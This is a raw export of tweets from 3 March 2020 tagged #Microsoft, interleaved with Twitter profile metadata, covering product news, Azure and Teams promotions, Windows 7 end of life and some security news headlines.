    <t>{'id': 2981340022, 'id_str': '2981340022', 'name': 'Qubark', 'screen_name': 'QubarkExperts', 'location': 'London', 'description': 'We specialise in Microsoft technologies. We are experts in delivering solutions involving SQL server, MS BI, Azure, BizTalk, Big Data, Active Directory', 'url': 'https://t.co/BFnIzxf14U', 'entities': {'url': {'urls': [{'url': 'https://t.co/BFnIzxf14U', 'expanded_url': 'http://www.qubark.com', 'display_url': 'qubark.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 253, 'friends_count': 2014, 'listed_count': 29, 'created_at': 'Fri Jan 16 15:47:40 +0000 2015', 'favourites_count': 20, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 464,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'http://pbs.twimg.com/profile_images/1171369446436417536/RHq1oTgt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1171369446436417536/RHq1oTgt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2981340022/1568111191',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</si>
  <si>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16:50:59 +0000 2020</t>
  </si>
  <si>
    <t>SharePoint End of Support is coming - don't be caught out. Read our latest blog #sharepoint #sharepointendofsupport #microsoft #azure
https://t.co/lEpFoIr82v https://t.co/PRC5TZgQkk</t>
  </si>
  <si>
    <t>Tue Mar 03 16:50:12 +0000 2020</t>
  </si>
  <si>
    <t>So #Windows7 reaches end of life while the #coronavirus reaches #Seattle and forces a big tug-of-war on #Microsoft's profits; right as their awesome new spate of hardware hits that catapults them past #Apple innovation-wise into the future. #StrangerThanFiction https://t.co/xVcyOxWlaH</t>
  </si>
  <si>
    <t>{'id': 2348731, 'id_str': '2348731', 'name': 'Mike Levin, SEO in NYC', 'screen_name': 'miklevin', 'location': 'New York, NY', 'description': 'Philly-bred nerd daddy in NYC, just married and living in the light of the Emerald City with anime-cute kitties. IG/snap/twitter/YouTube/LinkedIn/gmail miklevin', 'url': 'https://t.co/KcRhPtsVEM', 'entities': {'url': {'urls': [{'url': 'https://t.co/KcRhPtsVEM', 'expanded_url': 'https://www.youtube.com/mikelevin', 'display_url': 'youtube.com/mikelevin', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1841, 'friends_count': 366, 'listed_count': 121, 'created_at': 'Mon Mar 26 20:00:22 +0000 2007', 'favourites_count': 676, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11063, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EBDDC1', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/967420038369234945/hnhNkdwj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/967420038369234945/hnhNkdwj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2348731/1519491763', 'profile_link_color': '0084B4',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</si>
  <si>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Tue Mar 03 16:50:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft sees opportunity in old computers that still need to be upgraded from #Windows7 https://t.co/m6ZFqEOfnI</t>
  </si>
  <si>
    <t>Tue Mar 03 16:48:07 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #cascadia-code: This is a fun, new monospaced font that includes programming ligatures and is designed to enhance the modern look and feel of the Windows Terminal.
https://t.co/I5xpWGMizo</t>
  </si>
  <si>
    <t>{'id': 171905721, 'id_str': '171905721', 'name': 'ttys22', 'screen_name': 'ttys22', 'location': '', 'description': 'Archlinux, VIM, Music &amp; ç«¹ç¬›, Golang, Java, Rust , C, Scala , PHP ,wordpress, é™„åŠ ç¦åˆ©ï¼šæ— èŠ‚æ“åœ°è½¬å‘å›¾ç‰‡ï¼Œæ…Žfo, ä¸Šç­æ—¶é—´æ…Žç‚¹', 'url': 'https://t.co/wj0Mkcnpwg', 'entities': {'url': {'urls': [{'url': 'https://t.co/wj0Mkcnpwg', 'expanded_url': 'http://80x86.io/', 'display_url': '80x86.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 578, 'friends_count': 445, 'listed_count': 63, 'created_at': 'Wed Jul 28 13:17:06 +0000 2010', 'favourites_count': 676, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5347,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'http://pbs.twimg.com/profile_images/473105491057340416/FOqiV-t-_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/473105491057340416/FOqiV-t-_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/171905721/1439984196',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</si>
  <si>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16:47:50 +0000 2020</t>
  </si>
  <si>
    <t>Malicious actors produce Coronavirus-themed malware, new Gmail scanning capabilities block over 99.9% of threats, and more...
To read our newsletter: https://t.co/YHY5H325xf
#Coronavirus #CyberSecurity #Gmail #Ghostcat #Google  #Ledgerops #Malware #Microsoft #RCE https://t.co/0alzwet8Oi</t>
  </si>
  <si>
    <t>{'id': 1041740203906539521, 'id_str': '1041740203906539521', 'name': 'LedgerOps', 'screen_name': 'LedgerOps', 'location': '', 'description': 'LedgerOps protects everyday companies from rapidly evolving security threats by providing comprehensive security solutions with simple and actionable insights.', 'url': 'https://t.co/SomJ9Myp2R', 'entities': {'url': {'urls': [{'url': 'https://t.co/SomJ9Myp2R', 'expanded_url': 'https://ledgerops.com/', 'display_url': 'ledgerops.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 67, 'friends_count': 15, 'listed_count': 2, 'created_at': 'Mon Sep 17 17:26:33 +0000 2018', 'favourites_count': 35, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 674, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1056324401644400640/4scEmKbs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1056324401644400640/4scEmKbs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1041740203906539521/1540682329',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</si>
  <si>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16:46:03 +0000 2020</t>
  </si>
  <si>
    <t>Read my posts on where to start with cloud certifications, and look for my post this week on how they can benefit you and your company. #cloud #Microsoft #Azure #AzureFamily https://t.co/4IA2ySarMJ https://t.co/L5QmCwrltr</t>
  </si>
  <si>
    <t>{'id': 997443329276174336, 'id_str': '997443329276174336', 'name': 'Dwayne Natwick', 'screen_name': 'DwayneNcloud', 'location': 'Michigan, USA', 'description': 'Microsoft Certified Trainer, MCT Regional Lead. Product Manager and strategy for Multi-Cloud Infrastructure Services at @Secure_24. https://t.co/LFviMgIPB1', 'url': 'https://t.co/tFEL8dOmwK', 'entities': {'url': {'urls': [{'url': 'https://t.co/tFEL8dOmwK', 'expanded_url': 'http://captainhyperscaler.com', 'display_url': 'captainhyperscaler.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/LFviMgIPB1', 'expanded_url': 'http://www.secure-24.com', 'display_url': 'secure-24.com', 'indices': [132, 155]}]}}, 'protected': False, 'followers_count': 160, 'friends_count': 204, 'listed_count': 6, 'created_at': 'Fri May 18 11:46:36 +0000 2018', 'favourites_count': 1554, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 798, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1227383498840956929/SpE-INWy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227383498840956929/SpE-INWy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/997443329276174336/1555546836',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</si>
  <si>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16:46:01 +0000 2020</t>
  </si>
  <si>
    <t>Tue Mar 03 16:45:02 +0000 2020</t>
  </si>
  <si>
    <t>Do you like #Microsoft's new colorful #icons for #Windows 10? https://t.co/R7WeHAxGI5 https://t.co/ofyABXXMNq</t>
  </si>
  <si>
    <t>{'id': 816762842376454162, 'id_str': '816762842376454162', 'name': 'Lightseid', 'screen_name': 'LightseidLtd', 'location': 'England, United Kingdom', 'description': 'Innovative Agency: Providing you a competitive advantage in a connected world via #branding, #consultancy, #graphicdesign, #marketing, #seo &amp; #webdesign', 'url': 'https://t.co/RWP4PQyUBG', 'entities': {'url': {'urls': [{'url': 'https://t.co/RWP4PQyUBG', 'expanded_url': 'https://www.lightseid.com', 'display_url': 'lightseid.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 845, 'friends_count': 123, 'listed_count': 3, 'created_at': 'Wed Jan 04 21:46:51 +0000 2017', 'favourites_count': 268, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 999,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'http://pbs.twimg.com/profile_images/1060507357397032961/QkVDRl0q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1060507357397032961/QkVDRl0q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/816762842376454162/1582193830',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</si>
  <si>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16:44:53 +0000 2020</t>
  </si>
  <si>
    <t>Do not be afraid of your desires! Fear mine! #Centerville   #thread #microsoft https://t.co/XAklleY9D5</t>
  </si>
  <si>
    <t>{'id': 1234585675833520129, 'id_str': '1234585675833520129', 'name': 'Amy Coppedge', 'screen_name': 'whoeferoughbi', 'location': 'Mobile, USA', 'description': 'I saw that you were perfect, and so I loved you. Then I saw that you were not perfect and I loved you even more', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 15, 'listed_count': 0, 'created_at': 'Mon Mar 02 21:05:43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'http://pbs.twimg.com/profile_images/1234759653562765312/-K6hn96P_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234759653562765312/-K6hn96P_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234585675833520129/1583224650',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</si>
  <si>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16:41:56 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has wrapped up February with a fresh new set of features for its #MicrosoftTeams platform. https://t.co/DFqool40vZ</t>
  </si>
  <si>
    <t>Tue Mar 03 16:40:33 +0000 2020</t>
  </si>
  <si>
    <t>Security Buzz: Now #Microsoft Wants To Secure Your iPhone via @Forbes https://t.co/VMnieAvinK #cybersecurity https://t.co/Oh12FSPAFr https://t.co/uKWXHTrgDs https://t.co/dWbOkktmBV</t>
  </si>
  <si>
    <t>{'id': 34911431, 'id_str': '34911431', 'name': 'Doug Schmeig', 'screen_name': 'Doug_Schmeig', 'location': '', 'description': '', 'url': 'https://t.co/CGJQuETBQG', 'entities': {'url': {'urls': [{'url': 'https://t.co/CGJQuETBQG', 'expanded_url': 'https://www.twitter.com/Doug_Schmeig', 'display_url': 'twitter.com/Doug_Schmeig', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 204, 'friends_count': 928, 'listed_count': 4, 'created_at': 'Fri Apr 24 12:25:14 +0000 2009', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4079,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'http://pbs.twimg.com/profile_images/1164101067514228736/WhoIbyq6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1164101067514228736/WhoIbyq6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/34911431/1495230780', 'profile_link_color': '009999',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</si>
  <si>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Tue Mar 03 16:40:04 +0000 2020</t>
  </si>
  <si>
    <t>According to @SOC_Prime in the post on @Peerlyst, "Attackers look around for Microsoft Exchange servers vulnerable to CVE-2020-0688". #microsoft #exchange #CVE https://t.co/ziY8IkGxQq</t>
  </si>
  <si>
    <t>{'id': 630533229, 'id_str': '630533229', 'name': 'Peerlyst', 'screen_name': 'Peerlyst', 'location': 'San Francisco, CA', 'description': 'Peerlyst is the largest global professional social network of #infosec professionals. Connect | Share knowledge | Build reputation | Advance your #career', 'url': 'https://t.co/K6itF0kIEN', 'entities': {'url': {'urls': [{'url': 'https://t.co/K6itF0kIEN', 'expanded_url': 'https://www.peerlyst.com', 'display_url': 'peerlyst.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 17219, 'friends_count': 5536, 'listed_count': 880, 'created_at': 'Sun Jul 08 19:17:32 +0000 2012', 'favourites_count': 17159, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 57650,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'http://pbs.twimg.com/profile_images/495810008613806080/Zcf5W3w4_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/495810008613806080/Zcf5W3w4_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/630533229/1414138334', 'profile_link_color': '1890C7',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</si>
  <si>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Tue Mar 03 16:39:31 +0000 2020</t>
  </si>
  <si>
    <t>How much is #Microsoft Surface Pro 12.3 PixelSense tablet pc?The #tablet that can replace your laptop Performance and versatility for professionals, creatives, and more.The versatility of a laptop and tablet. #TuesdayMorning
https://t.co/1bMtrRpGcO</t>
  </si>
  <si>
    <t>{'id': 1009671637971554304, 'id_str': '1009671637971554304', 'name': 'shopinbrand', 'screen_name': 'shopinbrand', 'location': 'USA', 'description': 'We are #technology lover and #entrepreneur. Write and review content.Following #SocialMedia to know what #PeopleAreAsking. Love #music #Apple #NBA #NFL #USA #UK', 'url': 'https://t.co/H3tHkrg85F', 'entities': {'url': {'urls': [{'url': 'https://t.co/H3tHkrg85F', 'expanded_url': 'https://shopinbrand.com', 'display_url': 'shopinbrand.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1143, 'friends_count': 1358, 'listed_count': 1, 'created_at': 'Thu Jun 21 05:37:32 +0000 2018', 'favourites_count': 17010, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8635,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'http://pbs.twimg.com/profile_images/1044429419547250690/08M5c2po_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1044429419547250690/08M5c2po_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1009671637971554304/1566112444',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</si>
  <si>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16:39:04 +0000 2020</t>
  </si>
  <si>
    <t>The average cost of a data breach is $3.6 million. Is your company prepared to deal with the aftermath of a cyberattack? Check out this infographic for more on how we can help protect your company. #Microsoft #cybersecurity https://t.co/A06pc5p2iy https://t.co/n10myu6tIe https://t.co/c9dtmk3ogG</t>
  </si>
  <si>
    <t>Tue Mar 03 16:36:06 +0000 2020</t>
  </si>
  <si>
    <t>Missing my #Lumia950. #Microsoft why did you kill #WindowsMobile???</t>
  </si>
  <si>
    <t>{'id': 94840393, 'id_str': '94840393', 'name': 'Pratyush Jena', 'screen_name': 'KrackyJacky', 'location': 'Bhubaneswar', 'description': 'Assistant Manager UCO Bank/ Former Asst Manager IDBI/Traveller/Bhubaneswar/Vijayawada.', 'url': 'https://t.co/4iVvRUEhSo', 'entities': {'url': {'urls': [{'url': 'https://t.co/4iVvRUEhSo', 'expanded_url': 'http://facebook.com/pratyushjena18', 'display_url': 'facebook.com/pratyushjena18', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 217, 'friends_count': 431, 'listed_count': 11, 'created_at': 'Sat Dec 05 18:17:46 +0000 2009', 'favourites_count': 2236, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 15278, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '310A38', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/852363750405529602/9PpWkkU6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/852363750405529602/9PpWkkU6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/94840393/1389853989', 'profile_link_color': '8B0000',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</si>
  <si>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Tue Mar 03 16:35:24 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Chinese Security Firm Says CIA Hackers Attacked China Since 2008:" https://t.co/2YDRTJUiAD
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Tue Mar 03 16:32:57 +0000 2020</t>
  </si>
  <si>
    <t>*** Tip of the Day ***
Microsoft Translator has recently been embedded into Word, Excel, and PowerPoint, in Office 365. You can translate the words/phrases in your documents.
Here's how to do it: https://t.co/V1Pxn5KXZL
#Microsoft #Tipoftheday #Office365 https://t.co/hA5ydIahSt</t>
  </si>
  <si>
    <t>Tue Mar 03 16:31:51 +0000 2020</t>
  </si>
  <si>
    <t>Doing a giveaway at 1,500 followers #Mixer #mixerstreamersconnect #mixercommunity #mixerstream #mixerstreamersunite #xboxstreamer #YouTube #Facebook #xbox #Microsoft #mixers #mixersnightin https://t.co/ESL5aZ4oYq</t>
  </si>
  <si>
    <t>Tue Mar 03 16:31:13 +0000 2020</t>
  </si>
  <si>
    <t>#speakerannouncement!
We're delighted Frank O'Donnell @Microsoft will speak at our upcoming #PharmaSummit2020 event on April 2nd.  
Book here: https://t.co/rvMu2MiNCR
#thePMI20 #innovation  #healthcare #lifesciences #innovation #microsoft #digitalhealth #healthtech https://t.co/kFXJajd3oW</t>
  </si>
  <si>
    <t>{'id': 334576185, 'id_str': '334576185', 'name': 'The PMI', 'screen_name': 'PharmaMgrsInst', 'location': 'Dublin Ireland', 'description': "The Pharmaceutical Managers' Institute.  We strive to support our members ongoing learning, growth and professional development in a rapidly evolving industry.", 'url': 'http://t.co/EagXXxdGqq', 'entities': {'url': {'urls': [{'url': 'http://t.co/EagXXxdGqq', 'expanded_url': 'http://www.thepmi.com/', 'display_url': 'thepmi.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 454, 'friends_count': 297, 'listed_count': 3, 'created_at': 'Wed Jul 13 09:50:14 +0000 2011', 'favourites_count': 847, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1057,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'http://pbs.twimg.com/profile_images/1088019088713179137/B_EcynTl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1088019088713179137/B_EcynTl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/334576185/1548238843',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</si>
  <si>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16:30:40 +0000 2020</t>
  </si>
  <si>
    <t>Our #Microsoft #Dynamics Salary Survey is now live, and we want to hear from YOU!
Make sure your voice is heard *and* get the chance to win a $500 prize: https://t.co/3aqHpY0DUg https://t.co/EfjZtwiux4</t>
  </si>
  <si>
    <t>Tue Mar 03 16:30:15 +0000 2020</t>
  </si>
  <si>
    <t>Learn how to update home share &amp;amp; profile path (regular &amp;amp; remote desktop) in Active Directory using CopyRight2. https://t.co/3MBYkwxyDa #it #Microsoft #ActiveDirectory #WindowsServer #ITPro #WinServ #WinSrv #Windows #FileServer #Server2019 #WinServ2019 #sysadmin #storage</t>
  </si>
  <si>
    <t>{'id': 182755757, 'id_str': '182755757', 'name': 'Sys-Manage', 'screen_name': 'SysManage', 'location': 'Frankfurt, Germany', 'description': 'Software for System and Network Administrators.  https://t.co/kIdlMRsh7k   contact info; info@sys-manage.com', 'url': 'http://t.co/tOkTJ9ARzE', 'entities': {'url': {'urls': [{'url': 'http://t.co/tOkTJ9ARzE', 'expanded_url': 'http://www.Sys-Manage.com', 'display_url': 'Sys-Manage.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/kIdlMRsh7k', 'expanded_url': 'http://www.facebook.com/pages/Sys-Manage/153504204665791', 'display_url': 'facebook.com/pages/Sys-Manaâ€¦', 'indices': [49, 72]}]}}, 'protected': False, 'followers_count': 13, 'friends_count': 37, 'listed_count': 0, 'created_at': 'Wed Aug 25 09:37:34 +0000 2010', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 114,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'http://pbs.twimg.com/profile_images/2354731512/vz4pbgfc7d2meec30az2_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2354731512/vz4pbgfc7d2meec30az2_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/182755757/1558961600',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</si>
  <si>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16:30:07 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has released a security advisory for 'MS15-124: Cumulative Security Update for Internet Explorer (CVE-2015-6161) (3125869)'. For more information please go to: https://t.co/9MqMGw0uKD #cybersecurity #vulnerability</t>
  </si>
  <si>
    <t>{'id': 779679996130553856, 'id_str': '779679996130553856', 'name': 'CC Cyber Defence Center', 'screen_name': 'cc_cyberdefence', 'location': 'England, United Kingdom', 'description': 'Providing 24/7 services to detect, prevent and remediate cyber security threats. https://t.co/iHwqRxfv4M #beready', 'url': 'https://t.co/HLwWqTBJJq', 'entities': {'url': {'urls': [{'url': 'https://t.co/HLwWqTBJJq', 'expanded_url': 'https://www.computacenter.com/uk', 'display_url': 'computacenter.com/uk', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/iHwqRxfv4M', 'expanded_url': 'https://bit.ly/2Yq7D5G', 'display_url': 'bit.ly/2Yq7D5G', 'indices': [81, 104]}]}}, 'protected': False, 'followers_count': 83, 'friends_count': 344, 'listed_count': 3, 'created_at': 'Sat Sep 24 13:52:51 +0000 2016', 'favourites_count': 54, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 580,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'http://pbs.twimg.com/profile_images/1143907201406427136/x9s8nZMo_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1143907201406427136/x9s8nZMo_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/779679996130553856/1573647256', 'profile_link_color': '24387F',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</si>
  <si>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16:30:03 +0000 2020</t>
  </si>
  <si>
    <t>New Zealand Department of Internal Affairs will be shifting its #citizen digital #identity services to the #cloud - #Microsoft #Azure @russellcraiguk #NZ https://t.co/Q4jHKB1dqB #MSFTAdvocate</t>
  </si>
  <si>
    <t>Tue Mar 03 16:29:35 +0000 2020</t>
  </si>
  <si>
    <t>Operators Face Unproven Edge Computing Business Models https://t.co/2ED5xKUFO8 #5g #ai #amazonwebservices(aws) #breakingnews #cloud #edgecomputing #google #microsoft #nokianetworks</t>
  </si>
  <si>
    <t>Tue Mar 03 16:28:07 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft teams request solution from Corey Buzzell @mmukalian #microsoftteams #powerapps #powerautomate https://t.co/wblgxI5LXZ</t>
  </si>
  <si>
    <t>Tue Mar 03 16:27:56 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/aqfvhI7BDo</t>
  </si>
  <si>
    <t>{'id': 560709612, 'id_str': '560709612', 'name': 'ComputerLand', 'screen_name': 'ComputerLandSV', 'location': 'San Jose, CA', 'description': '', 'url': 'http://t.co/hllvCBRbLs', 'entities': {'url': {'urls': [{'url': 'http://t.co/hllvCBRbLs', 'expanded_url': 'http://www.cland.com', 'display_url': 'cland.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 49, 'friends_count': 70, 'listed_count': 6, 'created_at': 'Sun Apr 22 22:00:31 +0000 2012', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2899, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '002DB3', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/2159588218/cland_black_logoOnTwitter_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2159588218/cland_black_logoOnTwitter_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/560709612/1528395718', 'profile_link_color': '002DB3',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</si>
  <si>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16:27:49 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/NES7iUyEb5</t>
  </si>
  <si>
    <t>{'id': 799005913982074882, 'id_str': '799005913982074882', 'name': 'RazorCity IT', 'screen_name': 'RazorCityIT', 'location': 'Little Rock, AR', 'description': 'Honest. Approachable. Helpful. Knowledgeable. The Best Managed Services Provider and Cloud Migration Specialists in Arkansas! #O365 #Azure #WPS', 'url': 'https://t.co/jLhTx9zBLI', 'entities': {'url': {'urls': [{'url': 'https://t.co/jLhTx9zBLI', 'expanded_url': 'https://www.razorcityit.com/', 'display_url': 'razorcityit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 249, 'friends_count': 1528, 'listed_count': 1, 'created_at': 'Wed Nov 16 21:47:09 +0000 2016', 'favourites_count': 27, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 985, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/832340960789012480/E3JPuoM__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/832340960789012480/E3JPuoM__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/799005913982074882/1487280510',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</si>
  <si>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16:27:41 +0000 2020</t>
  </si>
  <si>
    <t>"Technology's a natural extension of how we do our job. (It) has to fit into the experience for our co-workers and our customers," said @NewBelgium. #Dynamics365 #CRM empowers it. A #Microsoft partner, Basileia Consulting Group can too. https://t.co/sMDnc8wi5q</t>
  </si>
  <si>
    <t>Tue Mar 03 16:27:39 +0000 2020</t>
  </si>
  <si>
    <t>Watch how Virginia's Chesterfield County improved the lives of over 340,000 residents and saved $800,000 by replacing its outdated mainframe with a digital environment based on #Microsoft #Dynamics365. https://t.co/arCnhQzTpl</t>
  </si>
  <si>
    <t>{'id': 40876232, 'id_str': '40876232', 'name': 'Kerr Consulting', 'screen_name': 'KerrConsulting', 'location': 'The Woodlands, TX', 'description': 'Kerr Consulting offers accounting software solutions, customer relationship management software, time and attendance software and hardware, and more.', 'url': 'https://t.co/xNEOYsDyyT', 'entities': {'url': {'urls': [{'url': 'https://t.co/xNEOYsDyyT', 'expanded_url': 'http://www.kerrconsulting.com', 'display_url': 'kerrconsulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 376, 'friends_count': 92, 'listed_count': 19, 'created_at': 'Mon May 18 13:49:49 +0000 2009', 'favourites_count': 191, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1844, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EBEBEB', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1197435202/shirtlogo-red_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197435202/shirtlogo-red_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/40876232/1524537432',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</si>
  <si>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Tue Mar 03 16:27:18 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec #microsoft     @Microsoft365 polled Twitter followers to see how often they worked remotely and 72% of respondents work from home at least 1 day per week. With Microsoft, organizations can be agile and keep data secure. https://t.co/dJWfqJcPju</t>
  </si>
  <si>
    <t>Tue Mar 03 16:27:10 +0000 2020</t>
  </si>
  <si>
    <t>Finding parking spots with Custom Vision and IoT https://t.co/l8TcWbsrpG #Microsoft #Azure</t>
  </si>
  <si>
    <t>Tue Mar 03 16:26:57 +0000 2020</t>
  </si>
  <si>
    <t>Plus @mmukalian #microsoft teams sessions from Microsoft Ignite #microsoftteams #powerapps #powerautomate https://t.co/Nfg8kfddRH</t>
  </si>
  <si>
    <t>Tue Mar 03 16:25:54 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Azure, SitePro harnesses the power of data to drive digital transformation for its oil and gas company customers. https://t.co/HkE98V1f5H</t>
  </si>
  <si>
